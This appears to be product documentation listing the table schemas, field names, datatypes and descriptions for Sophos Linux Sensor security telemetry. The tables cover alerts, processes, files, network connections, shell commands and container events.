Skip to content

Schema

Table: alerts

Represents alert information.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the Alert was generated.
alert_id utf8 AlertID is the UUID for the alert.
sensor_id utf8 SensorID is the unique identifier for Sophos Linux Sensor (SLS).
priority utf8 Priority is the Alert's priority.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
policy_type utf8 PolicyType is the policy's type.
strategy_name utf8 StrategyName is the name of the strategy which triggered the alert.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.
messages list

Table: sensor_metadata

Represents a single key/value pair of metadata for specific sensor.

Name Datatype Description/Attributes
sensor_id utf8 SensorID is the unique identifier for SLS.
key utf8
value utf8

Table: sensors

Represents sensor information.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the process event was generated.
sensor_id utf8 SensorID is the unique identifier for SLS.
sensor_pid int32 SensorPid is the PID of the SLS process.
hostname utf8

Table: lost_records

LostRecord metaevents log instances of potential data loss in SLS.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the lost record was generated.
event_type int32 EventType represents the lost record event type.
action_type int32 ActionType represents what action lost record event type.
reason utf8 Reason is the reason the lost record event was generated.
lost_count int64 LostCount represents the number of records which were lost.
event_type_name utf8 EventTypeName is the name for the event type that occurred.
action_type_name utf8 ActionTypeName is the name for the action type that occurred.
sensor_id utf8 SensorID is the unique identifier for SLS.

Table: connections

Connections represent all network activity that contains a network address.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the event occurred.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
process_pid int32 ProcessPid is the process pid which created the event.
monotime_nanos int64 MonotimeNanos is the monotimenanos time that the event occurred.
dst_addr utf8 DstAddr is the destination address for the event.
dst_port int32 DstPort is the destination port for the event.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
success bool Success is the whether the connection attempt was successful.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: process_events

Process Metaevents representing a process action such as exec or fork.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the process event was generated.
event_type int32 EventType represents the process event type.
Fork(0): the process was created by a fork event;
Exec(1): the process was created by an exec event;
Exit(2): the process exited;
Baseline(3): the process event was created during the start of SLS.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
sensor_id utf8 SensorID is the unique identifier for SLS.
pid int32 PID is the process pid.
container_id utf8 ContainerID is the unique identifier for a running container instance.
parent_process_uuid utf8 ParentProcessUUID is a unique ID that represents the unique process of the parent process.
parent_pid int32 PID is the process pid of the parent process.
gid int32 Gid is the group ID associated with the task/thread.
group utf8 GroupName is the group name for the group ID of the task/thread.
uid int32 UID is the user ID associated with the task/thread.
username utf8 Username is the username for the user ID of the task/thread.
euid int32 Euid is the effective user ID for the task/thread.
effective_username utf8 EuidName is the effective username for the user ID of the task/thread.
fsuid int32 FsUID is the filesystem user ID associated with the task/thread.
fs_username utf8 FsUsername is the filesystem username for the FsUID of the task/thread.
fsgid int32 FsGid is the group ID associated with the task/thread.
fs_group utf8 FsGroupName is the filesystem username for the FsGID of the task/thread.
login_uid int32 LoginUID is the user ID assigned to the user during login associated with the task/thread.
login_username utf8 LoginUsername is the username for the loginuid of the task/thread.
login_gid int32 LoginGID is the group ID assigned to the user during login associated with the task/thread.
login_group utf8 LoginGroup is the group for the loginuid of the task/thread.
path utf8 Path is the path of the process.
arguments list Arguments are the arguments that were used when creating the process.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
child_pid int32 ChildPID is the PID of the child process created on fork.
child_process_uuid utf8 ChildProcessUUID is a unique ID of a child process created on fork.
egid int32 Egid is the effective group ID for the task/thread.
effective_group utf8 EgidName is the effective group name for the group ID of the task/thread.
tid int32 TID the process' ID in kernel-land.
return_value int32 ReturnValue is the return value on exec
event_type_name utf8 EventTypeName is the name for the event type that occurred.
Fork(0): the process was created by a fork event;
Exec(1): the process was created by an exec event;
Exit(2): the process exited;
Baseline(3): the process event was created during the start of SLS
audit_group_id int32 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: file_events

FileOperation is a metaevent describing a specific file operation.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the file operation event was generated.
sensor_id utf8 SensorID is the unique identifier for SLS.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
pid int32 PID is the process pid.
container_id utf8 ContainerID is the unique identifier for a running container instance.
path utf8 Path is the path where the file operation occurred.
source_path utf8 SourcePath is the source file path that was linked or moved into the file path.
event_type int32 EventType represents the file event type.
Create(1): the file was created;
Link(2): the file was linked;
Modify(3): the file was modified;
Delete(4): the file was deleted;
Rename(5): the file was renamed;
Symlink(6): the file was symlinked;
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
event_type_name int32 EventTypeName is the name for the event type that occurred.
Create(1): the file was created;
Link(2): the file was linked;
Modify(3): the file was modified;
Delete(4): the file was deleted;
Rename(5): the file was renamed;
Symlink(6): the file was symlinked;
audit_group_id int32 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: shell_commands

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the unixnano timestamp of the event.
program_filename utf8 ProgramFilename is the file name of the program associated with the event.
program_arguments file ProgramArguments is the program's arguments.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
process_pid int32 ProcessPid is the process pid which created the event.
shell_process_uuid utf8 ShellProcessUUID is a unique ID that represents the unique process of the shell.
shell_process_pid int32 ShellProcessPid is the process pid for the shell that created the event.
exec_event_id utf8 ExecEventID is the ID given to the exec event.
monotime_nanos int64 MonotimeNanos is the monotimenanos time that the event occurred.
container_id utf8 ContainerID is the unique identifier for a running container instance.
sensor_id utf8 SensorID is the unique identifier for SLS.
uid int32 Uid is the user ID associated with the task/thread.
username utf8 Username is the username for the user ID of the task/thread.
gid int32 Gid is the group ID associated with the task/thread.
group utf8 Group is the group name for the group ID of the task/thread.
euid int32 Euid is the effective user ID for the task/thread.
effective_username utf8 EffectiveUsername is the effective username for the user ID of the task/thread.
egid int32 Egid is the effective group ID for the task/thread.
effective_group utf8 EffectiveGroup is the effective group name for the group ID of the task/thread.
suid int32 Suid is the saved user ID associated with the task/thread.
saved_username utf8 SavedUsername is the saved username for the saved user ID of the task/thread.
sgid int32 Sgid is the saved group ID for the task/thread.
saved_group utf8 SavedGroupname is the saved group name for the saved group ID of the task/thread.
fsuid int32 Fsuid is the filesystem user ID associated with the task/thread.
file_system_username utf8 FileSystemUsername is the filesystem username for the FsUID of the task/thread.
fsgid int32 Fsgid is the group ID associated with the task/thread.
file_system_group utf8 FileSystemGroup is the filesystem username for the FsGID of the task/thread.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: command_line_events

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the command line event was generated.
data utf8 Data is the raw data that is contained in the command line event.
monotime_nanos int64 MonotimeNanos is the monotimenanos time that the command line event occurred.
process_uuid utf8 ProcessUUID is a unique ID that represent the unique process.
process_pid int32 ProcessPid is the process pid which created the event.
cli_process_uuid utf8 CLIProcessUUID is a unique ID that represent the unique process of the cli process.
cli_process_pid int32 CLIProcessPid is process pid of the cli process.
cli_source utf8 CLISource is where the information about commands is gathered from.
PROCESS: the command information was obtained using the process that was executed from the shell;
READLINE: the command information was obtained using readline;
container_id utf8 ContainerID is the unique identifier for a running container instance.
sensor_id utf8 SensorID is the unique identifier for SLS.
uid int32 Uid is the user ID associated with the task/thread.
username utf8 Username is the username for the user ID of the task/thread.
gid int32 Gid is the group ID associated with the task/thread.
group utf8 Group is the group name for the group ID of the task/thread.
euid int32 Euid is the effective user ID for the task/thread.
effective_username utf8 EffectiveUsername is the effective username for the user ID of the task/thread.
egid int32 Egid is the effective group ID for the task/thread.
effective_group utf8 EffectiveGroup is the effective group name for the group ID of the task/thread.
suid int32 Suid is the saved user ID associated with the task/thread.
saved_username utf8 SavedUsername is the saved username for the saved user ID of the task/thread.
sgid int32 Sgid is the saved group ID for the task/thread.
saved_group utf8 SavedGroupname is the saved group name for the saved group ID of the task/thread.
fsuid int32 Fsuid is the filesystem user ID associated with the task/thread.
file_system_username utf8 FileSystemUsername is the filesystem username for the FsUID of the task/thread.
fsgid int32 Fsgid is the group ID associated with the task/thread.
file_system_group utf8 FileSystemGroup is the filesystem username for the FsGID of the task/thread.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the command line event is part of an incident.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: container_events

Container is a MetaEvent that represents all container eventscreate, running, exited, destroyed. It's used in investigations.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the unixnano timestamp for when the container event occurred.
container_id utf8 ContainerID is the unique identifier for a running container instance.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the container event is part of an incident.
sensor_id utf8 SensorID is the unique identifier for SLS.
process_uuid utf8 ProcessUUID is a unique ID that represent the unique process.
event_type int32 EventType represents the container event type.
Unknown(0): an unknown container action occurred;
Created(1): a container was created;
Started(2): a container was started;
Exited(3): a container was exited;
Destroyed(4): a container was destroyed.
container_name utf8 ContainerName is the name assigned to the container.
image_id utf8 ImageID is the unique image ID that the container was built from.
image_name utf8 ImageName is the name of the image that the container was built from.
pod_name utf8 PodName is the name of the Kubernetes pod if applicable.
namespace utf8 Namespace is the Kubernetes namespace for the pod if applicable.
event_type_name utf8 EventTypeName is the name for the event type that occurred.
Unknown(0): an unknown container action occurred;
Created(1): a container was created;
Started(2): a container was started;
Exited(3): a container was exited;
Destroyed(4): a container was destroyed
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.